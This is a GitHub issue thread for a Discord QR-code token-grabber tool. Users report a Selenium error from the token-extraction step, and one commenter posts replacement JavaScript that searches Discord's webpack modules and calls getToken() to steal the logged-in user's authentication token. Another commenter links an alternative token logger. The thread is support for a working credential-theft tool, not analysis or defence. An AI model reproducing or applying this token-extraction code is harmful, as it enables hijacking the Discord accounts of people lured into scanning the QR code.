### ISSUE TITLE
Help

### ISSUE THREAD

**Issue by GamerHun6688** [moom825/Discord-QR-Token-Grabber#5]
i really need help to fix it somehow
Traceback (most recent call last):
  File "C:\Users\Ryzen\Desktop\Discord-QR-Token-Grabber-main\Discord-QR.py", line 49, in <module>
    token = driver.execute_script('''
  File "C:\Users\Ryzen\AppData\Roaming\Python\Python39\site-packages\selenium\webdriver\remote\webdriver.py", line 879, in execute_script
    return self.execute(command, {
  File "C:\Users\Ryzen\AppData\Roaming\Python\Python39\site-packages\selenium\webdriver\remote\webdriver.py", line 425, in execute
    self.error_handler.check_response(response)
  File "C:\Users\Ryzen\AppData\Roaming\Python\Python39\site-packages\selenium\webdriver\remote\errorhandler.py", line 247, in check_response
    raise exception_class(message, screen, stacktrace)
selenium.common.exceptions.JavascriptException: Message: javascript error: webpackJsonp is not defined
  (Session info: headless chrome=96.0.4664.45)
Stacktrace:
Backtrace:
        Ordinal0 [0x00E76903+2517251]
        Ordinal0 [0x00E0F8E1+2095329]
        Ordinal0 [0x00D12848+1058888]
        Ordinal0 [0x00D14F44+1068868]
        Ordinal0 [0x00D14E0E+1068558]
        Ordinal0 [0x00D156BA+1070778]
        Ordinal0 [0x00D664F9+1402105]
        Ordinal0 [0x00D564D3+1336531]
        Ordinal0 [0x00D65BBF+1399743]
        Ordinal0 [0x00D5639B+1336219]
        Ordinal0 [0x00D327A7+1189799]
        Ordinal0 [0x00D33609+1193481]
        GetHandleVerifier [0x01005904+1577972]
        GetHandleVerifier [0x010B0B97+2279047]
        GetHandleVerifier [0x00F06D09+534521]
        GetHandleVerifier [0x00F05DB9+530601]
        Ordinal0 [0x00E14FF9+2117625]
        Ordinal0 [0x00E198A8+2136232]
        Ordinal0 [0x00E199E2+2136546]
        Ordinal0 [0x00E23541+2176321]
        BaseThreadInitThunk [0x7690FA29+25]
        RtlGetAppContainerNamedObjectPath [0x77E97A7E+286]
        RtlGetAppContainerNamedObjectPath [0x77E97A4E+238]

**Comment by peefpee** [comment]
same i got the same error

**Comment by Bardia-SG** [comment]
same here

**Comment by Ivan228-s** [comment]
replace
 `      token = driver.execute_script('''
        import webpackJsonp;
        var req = webpackJsonp.push([
            [], {
                extra_id: (e, t, r) => e.exports = r
            },
            [
                ["extra_id"]
            ]
        ]);
        for (let e in req.c)
            if (req.c.hasOwnProperty(e)) {
                let t = req.c[e].exports;
                if (t && t.__esModule && t.default)
                    for (let e in t.default) "getToken" === e && (gotem = t.default.getToken())
            }
        return gotem;''')`
with 
`token = driver.execute_script('''
    return (webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken();  
                ''')`

**Comment by lyamnchris2** [comment]
at line what ?

**Comment by mouadessalim** [comment]
or use this one: https://github.com/9P9/Discord-QR-Token-Logger
